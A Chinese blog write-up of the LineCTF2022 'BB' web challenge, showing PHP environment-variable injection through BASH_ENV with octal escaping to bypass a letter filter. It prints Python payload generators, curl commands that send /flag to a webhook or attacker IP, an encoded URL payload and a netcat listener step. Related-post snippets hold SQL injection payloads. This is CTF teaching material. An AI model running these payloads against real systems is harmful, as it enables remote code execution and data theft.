ctfer的日常web:[LineCTF2022]BB(buuctf)

PHP代码审计中的环境变量注入漏洞及利用示例
原创 已于 2024-03-09 22:45:49 修改 · 636 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端 #javascript #服务器 #web安全 #安全 #网络安全

于 2024-03-09 22:43:41 首次发布
本文详细描述了一段PHP代码中的环境变量注入漏洞,如何通过绕过大小写过滤并构造payload进行攻击,包括使用curl发送POST请求上传文件和利用反弹shell技术。作者还引用了官方Wordpress博客作为参考。

代码审计:

<?php
    error_reporting(0);

    function bye($s, $ptn){
        if(preg_match($ptn, $s)){   //$s中如果存在$ptn,则返回false
            return false;
        }
        return true;
    }

    foreach($_GET["env"] as $k=>$v){
        if(bye($k, "/=/i") && bye($v, "/[a-zA-Z]/i")) { //过滤= 过滤大小写字母
            putenv("{$k}={$v}");        //定义环境变量
        }
    }
    system("bash -c 'imdude'");     //这里执行了imdude,所以我们要对环境变量imdude进行操作
    
    foreach($_GET["env"] as $k=>$v){
        if(bye($k, "/=/i")) {   //过滤=
            putenv("{$k}");
        }
    }
    highlight_file(__FILE__);
?>

 环境变量注入:

参考网站

使$k=BASH_ENV

$v=【攻击命令,如cat /flag | curl -d @- http://xx.xx.xx.xx:7001(攻击机ip)】

 绕过大小写过滤:

在linux中,$'\101' = A,故可以用八进制(即0o101=A)来绕过。

EXP(1):

向指定的 webhook 站点[]发送一个 POST 请求,并上传了一个名为 flag 的文件。

b"curl https://webhook.site/a27433a-afdb-9d9a080beb55 -F flag=@/flag"

这个命令的具体含义如下:

curl: 是一个命令行工具,用于在终端中传输数据,支持多种协议。

https://webhook.site/a278d631-e3e5-433a-afdb-9d9a080beb55: 这是一个 webhook 站点的 URL,其中包含一个唯一的标识符。

-F flag=@/flag: 这部分是命令的参数,其中 -F 表示要发送一个表单(form)数据,flag=@/flag 意味着要上传一个名为 flag 的文件。

from urllib.parse import quote_plus

cmd = b"curl https://webhook.site/a278d63fdb-9d9a080beb55 -F flag=@/flag"
parts = cmd.split(b' ')
cmd = ["$'"+''.join([f'\\{x:03o}' for x in p])+"'" for p in parts]
cmd = ' '.join(cmd)

payload = "$(%s)" % cmd
print(payload)
print(quote_plus(payload))

下载完成后查看里面内容即可,有多种方法:

一,在文件名后面加“.txt”;

二,用sublime打开;

三,.....................

EXP(2):

通过反弹shell的方式;

先在攻击机(自己的服务器)上,输入“nc -lvvp [端口号]”

import string

# cmd = "cat /flag"
cmd = "cat /flag | curl -d @- http://xx.xx.xx.xx:7001" #(攻击机ip)
str = ''
for i in cmd:
    if i in string.ascii_lowercase:
        j = oct(ord(i))[2:]
        str += "$'\\"+j+"'"
    else:
        str+=i

print(str)

再将结果拼接到url上如:

?env[BASH_ENV]=$'\143'$'\141'$'\164' /$'\146'$'\154'$'\141'$'\147' | $'\143'$'\165'$'\162'$'\154' -$'\144' @- $'\150'$'\164'$'\164'$'\160'://xx.xx.xx.xx:7001

在攻击机(自己的服务器)上,输入“nc -lvvp [端口号]” 。

如果成功的话就能看到flag。

官方WP:

https://blog.maple3142.net/2022/03/27/line-ctf-2022-writeups/

Hunter1_1
关注
linectf2022 online-library_[LineCTF2022]gotm
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-05 1014
linectf2022 online-library_[LineCTF2022]gotm linectf2022 online-library源码,分析一下几个路由和对应的请求处理函数, [LineCTF2022]gotm注册功能:func regist_handler(w http.ResponseWriter, r *http.Request) { uid := r.FormValue("id") upw := r.FormValue("pw") if uid == "" ||
2022 lineCTF WEB复现WriteUp
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-06 910
lineCTF WEB复现WriteUp Gotm, is_admin == true就给flag,需要伪造token,需要秘钥才行 再往下看,经典SSTI 如果能控制acc也就是id为{{.}},就能得到这三个的值,然后id可控,直接打就行了 接下来思路就很简单了,先注册一个id为{{.}}的用户: is_admin == true就给flag,需要伪造token,需要秘钥才行 再往下看,经典SSTI, 如果能控制acc也就是id为{{.}},就能得到这三个的值,然后id可控,直接打就行了 接下来思路就很
[LineCTF2022]BB
Sk1y的博客
06-18 1764
八进制,RCE,利用环境变量进行注入
LineCTF2022】Memo Driver
weixin_60581972的博客
09-30 713
在proc/self/cmdline 发现pythonindex.py 最后 也没能读取出来...hh。再之后读取proc/self/environ 发现一个假的flag。之后就想着嗖哈一把嗦,直接bp跑脚本,没想到第一个就是 = =这里发现memo,以为是读取命令执行记录(错误示范...)详细绕过可以去看这个文章,这里只是寻找buu flag。读取无果之后最后只能尝试其他方法了。
虎符CTF 2022 mva
weixin_46483787的博客
03-21 1102
前言: 昨天刚结束的虎符CTF的一道题,开始的太晚了,比赛结束半个小时才做出来,略显可惜 逆向分析: 拿到程序,稍做处理后可以看到,首先是让我们输入一段0x100的字节,然后开始取指-执行-取指-执行的过程,实现了一个小型的计算系统 然后我们简单的进行一些重命名,识别出一些结构来: 如push和pop: 设置寄存器的值 以及一些加减乘除和寄存器赋值等操作就不一一放截图了 漏洞 我们熟知VM的题漏洞基本都是边界检测的问题,sp的检测啊,寄存器指针的检测啊等等,本题也不例外 首先发现的是这两个地方: c
《从0到1:CTFer成长之路》书籍配套题目-[第三章 web进阶]Encrypted Flask
weixin_46703850的博客
03-28 1477
[第三章 web进阶]Encrypted FlaskStep One
《从0到1:CTFer成长之路》 [第一章 web入门] 粗心的小李
Senimo
01-12 2789
《从0到1:CTFer成长之路》 [第一章 web入门] 粗心的小李 TIP:看看能不能找到信息吧? 启动环境: 提示是将.git文件放到了线上环境中,也就是产生了GIT泄露漏洞 使用GitHack获取目标泄露的/.git文件: python2 GitHack.py http://4e6b4e1a-dcb6-4d8b-aafd-df6ff62cb178.node3.buuoj.cn/.git/ 成功获取: 进入到该文件夹下: 其存在有index.html文件,使用cat命令打开: <p>
《从0到1:CTFer成长之路》书籍配套题目--afr_3 BUUCTF
wuyaowangchuan的博客
11-19 2905
还是任意文件读取漏洞 进入坏境 点入链接 这边可以读取文件 试一试article?name=/etc/passwd 读不到flag 找找WP /proc/sched_debug # 提供cpu上正在运行的进程信息,可以获得进程的pid号,可以配合后面需要pid的利用 /proc/mounts # 挂载的文件系统列表 /proc/net/arp # arp表,可以获得内网其他机器的地址 /proc/net/route # 路由表信息 /proc/net/tcp and /proc/net/udp .
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]死亡ping命令
weixin_46703850的博客
02-26 3636
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]死亡ping命令
BUUCTF 部分web wp
Tiny_Hacker的博客
05-21 1814
又要求我们对secret赋值而且还是POST传参,而且赋的值还得是他指定的,在右下有一串base64加密的字符串,对其进行解码后,得到了一个值,猜测是他指定的那个值。添加XFF后,发现没有回应,尝试其他伪造ip的方式,发现当X-Real-ip时有回应,并出现了flag。查询结果出来了flag字符,对这个flag,没有办法查看,只能借助别人的wp了,对大佬膜拜!访问index.pgp.bak,得到了一个文件,打开后是一串代码,进行审计。又提示我们对key赋值,而且赋值为他给定的值,在源码里发现了key值。
[LineCTF2022]gotm ( golang SSTI + JWT伪造 )
ShenZ的博客
04-15 5800
我们的思路是利用ssti得到secret_key,再伪造jwt即可得到flag。 如果是正常思路我们应该{{.secret_key}}注入得到key字段,但是root_handler函数中得到的acc是数组中的地址,也就是get_account函数通过在全局变量acc数组中查找我们的用户,这种情况下直接注入{{.secret_key}}会返回空 我们的payload应该是{{.}},可以得到 Account结构的所有字段 /regist?id={{.}}&pw=123 /auth?id={{.}}&
虎符CTF-2022 babygame 题解
CoLin的pwn小屋
04-01 1350
虎符CTF最简单的一道pwn题。
[HFCTF 2022]两道web题目wp
cosmoslin的博客
03-28 6791
ezphp <?php (empty($_GET["env"])) ? highlight_file(__FILE__) : putenv($_GET["env"]) && system('echo hfctf2022');?> 看到这段代码不难联想到P神的博客 我是如何利用环境变量注入执行任意命令 题目给了一个docker用于本地搭建环境,可以发现题目用的系统环境为debian。在debian系操作系统中,sh指向dash;在centos系操作系统中,sh指向bash。 由于
[NISACTF 2022]WriteUp web
Pysnow's Blog
04-01 5506
[NISACTF 2022] WEB checkin 打开一看,本来一位就是简单的一道get传参题,结果发现复制的时候出现了问题 所以我就把代码复制到vscode上面来 发现存在Unicode特殊字符,直接把字符原样复制下来,然后URLencode编码一下 最终payload ?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%
Real World CTF 2022 两道web题wp
yink12138的博客
02-09 5287
Hack into Skynet 给了源码,先审一下 #!/usr/bin/env python3 import flask import psycopg2 import datetime import hashlib from skynet import Skynet app = flask.Flask(__name__, static_url_path='') skynet = Skynet() def skynet_detect(): req = { 'method
[*CTF 2022 pwn] examination
weixin_52640415的博客
04-17 673
抽空参加个比赛,水平有限只作了一道题,但还是要记录一下,毕竟好多人还0解呢。学渣的逆袭。 英文写的是ret2shool 这个跟ret2XXX的没关系。 代码长了读程序就麻烦,慢慢读把函数功能整理如下(叫法随个人理解,英文看单词不认识): 教师菜单 增加学生:增加一个学生结构,管理块chunk :0x28含指向成绩单:stud{ptr_s,0,0,0,0} 成绩单chunk:0x18含学生评级,成绩,评价指针,评价长度 s{int idx,int score, ptr_prv,int x,int pr
linux bash -c_说出来也许你不信,我被 Linux 终端嘲笑了…….
weixin_39535557的博客
11-28 472
☞ 程序员进阶架构师必备资源免费送 ☜人这一辈子,真的是非常不容易:读书时,被老师、同学嘲笑,工作时,被老板、同事嘲笑,就连出去撸个串儿,还可能被朋友嘲笑……这些也就算了,毕竟大家还都是同类,都是活生生的人。但是,你如果被 Linux 终端给嘲笑了,你的内心会是什么感受?今天要介绍的,是一个非常有趣的 CLI 工具,这个工具可以实现当你在终端输错命令时,会随机回复一句嘲笑你的话。虽然是嘲...
bash的-c选项
weixin_42992444的博客
07-12 8025
关于bash的-c选项 bash的-c选项, 表示把后续的参数当做命令行, 而不是脚本. manual page中, 关于bash的synopsis是这样的: [gewkiff@fedora d2]$ man -f bash bash (1) - GNU Bourne-Again SHell 然后执行 man 1 bash, 显示如下 可以看到, 它的SYNOPSIS是 bash [options] [command_string | file] bash的options有很
Linux Bash
玥晓珖的博客
11-05 1036
很久没更新博客了,最近在波士顿访学,开始了学习Linux之旅。     首先了解下shell: 在介绍bash之前,需要先介绍它的起源——shell。shell俗称壳,它是指UNIX系统下的一个命令解析器;主要用于用户和系统的交互。UNIX系统上有很多种Shell。首个shell,即Bourne Shell,于1978年在V7(AT&amp;T的第7版)UNIX上推出。后来,又演变出C s...
buuctf web随便注
最新发布
02-11
### 关于BUUCTF Web类别SQL注入入门题目教程 #### 背景介绍 在网络安全竞赛(CTF)中,Web安全挑战占据了重要位置。其中,SQL注入作为常见的攻击手段之一,在多个平台上都有所体现。对于初学者而言,《从0到1:CTFer成长之路》这本书籍提供了丰富的资源和指导[^1]。 #### SQL注入基础概念 SQL注入是一种通过将恶意的SQL命令插入到查询语句中的方式来操纵数据库的行为。当应用程序未能正确过滤用户输入时就可能发生这种情况。错误消息可以提供有关如何构建有效载荷的重要线索[^2]。 #### 实战演练 - 基本技巧 考虑一个简单的场景,目标页面存在参数`?id=`用于指定记录ID。如果直接访问该链接并附加单引号(`'`)导致服务器返回语法错误,则表明可能存在未处理好的字符串拼接漏洞: ```plaintext http://example.com/page.php?id=1' ``` 此时可以通过尝试不同的payload来进行测试,比如利用联合查询获取更多信息: ```sql ?id=0 UNION SELECT 1,2,GROUP_CONCAT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE() AND TABLE_NAME='fl4g'-- ``` 这段代码试图读取名为`fl4g`的数据表结构,并显示其列名[^3]。 另外一种方法是使用基于布尔盲注的方式逐步推断出隐藏数据的内容。例如下面的例子展示了怎样枚举当前库下的所有表格名称: ```sql 1' AND UPDATEXML(1,CONCAT(0x7e,(SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE())),1)-- ``` 这种方法适用于那些不会回显具体报错信息的情况,但仍能根据响应差异判断条件真假[^4]。 #### 工具辅助学习 除了手动编写Payload外,还可以借助自动化工具如SqlMap加快探索过程。这类软件能够自动检测多种类型的SQL注入缺陷,并执行相应的操作以帮助理解潜在风险。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值